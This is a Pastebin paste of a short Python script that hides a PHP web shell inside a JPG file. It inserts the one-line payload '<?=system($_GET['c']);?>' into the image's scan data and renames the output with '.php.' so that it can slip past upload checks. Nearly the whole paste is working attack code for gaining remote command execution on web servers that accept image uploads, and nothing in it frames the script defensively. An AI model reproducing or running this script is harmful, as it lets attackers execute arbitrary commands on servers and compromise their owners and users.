Guest User

Untitled

a guest
Sep 20th, 2019
297
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. # a simple script to inject PHP code into JPG file
  4. # thanks to Damien Cauquil for insetPayload()
  5. # ref: https://virtualabs.fr/Nasty-bulletproof-Jpegs-l.html
  6.  
  7. from sys import argv
  8. import struct
  9.  
  10.  
  11. def insertPayload(_in, _out, payload,off):
  12.     img = _in
  13.     # look for 'FF DA' (SOS)
  14.     sos = img.index("\xFF\xDA")
  15.     sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
  16.     sod = sos_size+2
  17.     # look for 'FF D9' (EOI)
  18.     eoi = img[sod:].index("\xFF\xD9")
  19.     # enough size ?
  20.     if (eoi - sod - off)>=len(payload):
  21.             _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
  22.             return True
  23.     else:
  24.             return False
  25.  
  26.  
  27. filein = argv[1]
  28. fileout = argv[1].replace(".",".php.")
  29.  
  30. payload = '<?=system($_GET[\'c\']);?>'
  31.  
  32. with open(filein, "rb") as rd:
  33.     data = rd.read()
  34.  
  35. with open(fileout, "wb") as wr:
  36.     insertPayload(data,wr,payload,4)
RAW Paste Data